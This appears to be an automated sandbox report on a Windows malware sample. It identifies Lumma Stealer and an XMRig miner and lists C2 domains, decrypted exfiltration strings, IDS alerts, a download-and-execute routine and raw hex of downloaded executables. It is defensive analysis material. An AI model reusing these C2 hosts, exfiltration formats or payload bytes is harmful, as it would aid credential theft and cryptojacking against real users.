                  Source: 00000003.00000002.1595198673.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rottieud.sbs
                  Source: 00000003.00000002.1595198673.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: brownieyuz.sbs
                  Source: 00000003.00000002.1595198673.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: explainvees.sbs
                  Source: 00000003.00000002.1595198673.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: ducksringjk.sbs
                  Source: 00000003.00000002.1595198673.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: thinkyyokej.sbs
                  Source: 00000003.00000002.1595198673.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: repostebhu.sbs
                  Source: 00000003.00000002.1595198673.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: pragapin.sbs
                  Source: 00000003.00000002.1595198673.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 00000003.00000002.1595198673.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 00000003.00000002.1595198673.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                  Source: 00000003.00000002.1595198673.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                  Source: 00000003.00000002.1595198673.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                  Source: 00000003.00000002.1595198673.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: BVnUqo--@StayAway777
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00419F47 CryptUnprotectData,3_2_00419F47

                  Bitcoin Miner

                  barindex
                  Yara detected Xmrig cryptocurrency miner
                  Source: Yara matchFile source: 28.2.RegSvcs.exe.30eb53d.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001C.00000002.1722768807.0000000003135000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Installer.exe PID: 7868, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7988, type: MEMORYSTR
                  Source: PqSIlYOaIF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.39.3:443 -> 192.168.2.9:49744 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.39.3:443 -> 192.168.2.9:49751 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.39.3:443 -> 192.168.2.9:49761 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.39.3:443 -> 192.168.2.9:49769 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.39.3:443 -> 192.168.2.9:49781 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.39.3:443 -> 192.168.2.9:49798 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.39.3:443 -> 192.168.2.9:49808 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.39.3:443 -> 192.168.2.9:49824 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.9:49927 version: TLS 1.2
                  Source: PqSIlYOaIF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: Installer.exe, 0000001A.00000002.1666398916.00000000004FC000.00000004.00000001.01000000.00000009.sdmp, Installer.exe, 0000001A.00000003.1666103048.0000000003482000.00000040.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000001C.00000002.1720402344.0000000000402000.00000020.00000400.00020000.00000000.sdmp
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: RegSvcs.exe, 0000001C.00000002.1722768807.0000000003150000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000001C.00000002.1722768807.000000000320E000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.28.dr
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0011C148 FindFirstFileExW,0_2_0011C148
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0011C1F9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0011C1F9
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0011C148 FindFirstFileExW,3_2_0011C148
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0011C1F9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_0011C1F9
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,9_2_004031DC
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,9_2_0040367D
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00F97978 FindFirstFileW,FindFirstFileW,free,13_2_00F97978
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004EA151 FindFirstFileExW,26_2_004EA151
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00F9881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,13_2_00F9881C
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20C737CDh]3_2_004400D0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], A489A0F1h3_2_0043C1F7
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20C737E9h]3_2_0043FA00
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], C0A4C970h3_2_00440A00
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9ABDB589h3_2_00438AB0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 9ABDB589h3_2_00425390
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+20C737C9h]3_2_0043FFB0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]3_2_0043D850
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+08h]3_2_0043E070
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+08h]3_2_0043E070
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 3E416E49h3_2_0043E070
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+68BB0A34h]3_2_0043E070
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 16194952h3_2_0043E070
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov dword ptr [eax+ebx], 30303030h3_2_00401000
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov dword ptr [eax+ebx], 20202020h3_2_00401000
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov ecx, dword ptr [esi+6Ch]3_2_0042C081
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0040E8AC
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov dword ptr [edx], 45444E5Bh3_2_0042B8BC
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov ecx, dword ptr [esi+6Ch]3_2_0042C144
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov ecx, dword ptr [esi+6Ch]3_2_0042C156
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov edi, ecx3_2_00423158
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then jmp dword ptr [00446658h]3_2_00423158
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+08h]3_2_0043E100
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov ecx, dword ptr [esi+6Ch]3_2_0042C107
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then jmp eax3_2_0043C91C
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00433930
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041C9D0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h3_2_004211E0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]3_2_004259FA
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx ecx, byte ptr [edi+ebx]3_2_00405980
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000D2h]3_2_0041E190
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov ecx, dword ptr [esp+0Ch]3_2_00401277
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then jmp dword ptr [00445B34h]3_2_0041928C
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov byte ptr [edi], bl3_2_0040D290
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then jmp ecx3_2_00421AA9
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_00429AB0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00417300
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then cmp al, 2Eh3_2_00425B23
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h3_2_00427BDB
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov byte ptr [edx], al3_2_00426BF0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx ebx, byte ptr [ecx]3_2_00426BF0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx ebx, byte ptr [ecx]3_2_00426BF0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov ecx, eax3_2_004263FF
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov dword ptr [esi], EBFCFA17h3_2_004263FF
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h3_2_00428B9A
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-0Bh]3_2_00421440
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h3_2_00427C00
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+34h]3_2_0040BC20
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041A4A9
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then cmp byte ptr [edi+eax-01h], 00000030h3_2_004014B3
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+34054260h]3_2_0040ED40
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx]3_2_0040ED40
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+04h]3_2_00418D34
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+12950679h]3_2_0043CDF0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]3_2_0041C64E
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041C64E
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h3_2_00429600
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00427637
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-3C1C5B4Dh]3_2_00417E38
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041BEE7
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-4D9E52A2h]3_2_0041BEE7
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h3_2_0042868E
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov eax, dword ptr [ebp-3Ch]3_2_004236A1
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041BF27
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-4D9E52A2h]3_2_0041BF27
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx edi, byte ptr [edx]3_2_00427F2C
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_00428FC0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+66430F91h]3_2_00438FC0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0041A780
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then mov word ptr [ebx], ax3_2_0041A780
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx edx, word ptr [edi]3_2_00436F89
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h3_2_00416F90
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx edi, byte ptr [esp+esi+38h]3_2_0040FFA6
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-72F953EAh]3_2_004247B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h28_2_012D4668

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49769 -> 104.21.39.3:443
                  Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49751 -> 104.21.39.3:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49751 -> 104.21.39.3:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49744 -> 104.21.39.3:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49744 -> 104.21.39.3:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49824 -> 104.21.39.3:443
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: pragapin.sbs
                  Source: Malware configuration extractorURLs: repostebhu.sbs
                  Source: Malware configuration extractorURLs: tamedgeesy.sbs
                  Source: Malware configuration extractorURLs: rottieud.sbs
                  Source: Malware configuration extractorURLs: ducksringjk.sbs
                  Source: Malware configuration extractorURLs: relalingj.sbs
                  Source: Malware configuration extractorURLs: brownieyuz.sbs
                  Source: Malware configuration extractorURLs: thinkyyokej.sbs
                  Source: Malware configuration extractorURLs: explainvees.sbs
                  Connects to a pastebin service (likely for C&C)
                  Source: unknownDNS query: name: pastebin.com
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004E1280 std::_Xinvalid_argument,GetTickCount,GetTickCount,Sleep,GetTickCount,GetModuleHandleW,GetSystemInfo,FindResourceW,LoadResource,URLDownloadToFileA,ShellExecuteA,GetProcAddress,LockResource,GetProcAddress,VirtualProtect,Concurrency::cancel_current_task,26_2_004E1280
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 10 Nov 2024 08:18:23 GMTContent-Type: application/octet-streamContent-Length: 3125704Last-Modified: Tue, 20 Aug 2024 12:02:17 GMTConnection: keep-aliveETag: "66c485c9-2fb1c8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 58 05 30 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 d4 4e 00 00 00 00 00 00 00 00 00 00 c0 75 2f 00 08 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d4 4e 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 10 Nov 2024 08:18:40 GMTContent-Type: application/octet-streamContent-Length: 8251392Last-Modified: Fri, 17 May 2024 16:26:03 GMTConnection: keep-aliveETag: "6647851b-7de800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 db 63 a2 64 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 10 5f 00 00 d8 7d 00 00 0c 32 00 d0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 b0 00 00 10 00 00 4c 7c 7e 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 ae 00 d8 46 00 00 00 40 af 00 e8 5c 00 00 00 10 76 00 9c ee 02 00 00 00 00 00 00 00 00 00 00 a0 af 00 6c 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 19 74 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c e0 ae 00 40 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 0a 5f 00 00 10 00 00 00 10 5f 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 60 04 01 00 00 20 5f 00 00 06 01 00 00 20 5f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 e0 dc 15 00 00 30 60 00 00 de 15 00 00 26 60 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 9c ee 02 00 00 10 76 00 00 f0 02 00 00 04 76 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 14 b9 03 00 00 00 79 00 00 ba 03 00 00 f4 78 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 e0 0a 32 00 00 c0 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 d8 46 00 00 00 d0 ae 00 00 48 00 00 00 ae 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 68 00 00 00 00 20 af 00 00 02 00 00 00 f6 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 30 af 00 00 02 00 00 00 f8 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 5c 00 00 00 40 af 00 e8 5c 00 00 00 fa 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 8e 00 00 00 a0 af 00 00 90 00 00 00 58 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 10 Nov 2024 08:18:40 GMTContent-Type: application/octet-streamContent-Length: 14544Last-Modified: Fri, 17 May 2024 16:26:03 GMTConnection: keep-aliveETag: "6647851b-38d0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 35 3a 6e fc 71 5b 00 af 71 5b 00 af 71 5b 00 af 71 5b 01 af 7d 5b 00 af 56 9d 7b af 74 5b 00 af 56 9d 7d af 70 5b 00 af 56 9d 6d af 72 5b 00 af 56 9d 71 af 70 5b 00 af 56 9d 7c af 70 5b 00 af 56 9d 78 af 70 5b 00 af 52 69 63 68 71 5b 00 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 c1 26 8b 48 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 0c 00 00 00 0a 00 00 00 00 00 00 08 50 00 00 00 10 00 00 00 00 01 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 06 00 00 00 00 00 00 00 00 70 00 00 00 04 00 00 08 19 01 00 01 00 00 00 00 00 04 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 50 00 00 3c 00 00 00 00 60 00 00 c0 03 00 00 00 40 00 00 60 00 00 00 00 1a 00 00 d0 1e 00 00 00 00 00 00 00 00 00 00 70 20 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 